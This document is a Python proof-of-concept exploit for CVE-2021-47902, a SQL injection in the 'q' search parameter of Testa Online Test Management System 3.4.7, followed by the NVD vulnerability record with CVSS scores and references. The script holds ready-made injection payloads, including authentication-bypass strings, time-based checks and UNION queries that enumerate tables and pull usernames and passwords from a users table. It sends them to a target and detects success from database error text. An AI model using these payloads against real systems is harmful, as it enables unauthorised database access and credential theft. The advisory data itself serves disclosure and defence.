CVE-2021-47902

# CVE-2021-47902 SQL Injection PoC for Testa Online Test Management System 3.4.7 # Target: Testa Online Test Management System # Vulnerability: SQL Injection in 'q' search parameter import requests import sys target_url = "http://target-host/testa/search" # Basic authentication bypass detection payload basic_payloads = [ "'", "' OR '1'='1", "' OR 1=1--", "' UNION SELECT NULL--", "' AND SLEEP(5)--" ] # Database enumeration payloads enum_payloads = [ "' UNION SELECT table_name FROM information_schema.tables--", "' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--", "' UNION SELECT username,password FROM users--" ] def test_sqli(url, payload): """Test SQL injection vulnerability""" params = {'q': payload} try: response = requests.get(url, params=params, timeout=10) # Check for SQL error indicators in response sql_error_indicators = [ "mysql", "sql", "syntax", "error", "warning", "mysql_fetch", "mysql_query", "pdo", "sqlite" ] response_lower = response.text.lower() for indicator in sql_error_indicators: if indicator in response_lower: return True, indicator except Exception as e: print(f"[-] Error: {e}") return False, None def main(): print("[*] CVE-2021-47902 SQL Injection Test") print(f"[*] Target: {target_url}") # Basic vulnerability check for payload in basic_payloads: print(f"[*] Testing payload: {payload}") is_vulnerable, error_type = test_sqli(target_url, payload) if is_vulnerable: print(f"[!] Potential SQL injection detected!") print(f"[!] Error type: {error_type}") print(f"[!] Vulnerable payload: {payload}") # Attempt enumeration print("[*] Attempting database enumeration...") for enum_payload in enum_payloads: print(f"[*] Testing: {enum_payload}") test_sqli(target_url, enum_payload) break if __name__ == "__main__": main()

{"cve": {"id": "CVE-2021-47902", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:13.283", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Testa Online Test Management System 3.4.7 contains a SQL injection vulnerability that allows attackers to manipulate database queries through the 'q' search parameter. Attackers can inject malicious SQL code in the search field to extract database information, potentially accessing sensitive user or system data."}, {"lang": "es", "value": "Testa Online Test Management System 3.4.7 contiene una vulnerabilidad de inyección SQL que permite a los atacantes manipular consultas de la base de datos a través del parámetro de búsqueda 'q'. Los atacantes pueden inyectar código SQL malicioso en el campo de búsqueda para extraer información de la base de datos, accediendo potencialmente a datos sensibles de usuarios o del sistema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://web.archive.org/web/20220406031253/https://testa.cc/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49194", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/testa-online-test-management-system-q-sql-injection", "source": "[email protected]"}]}}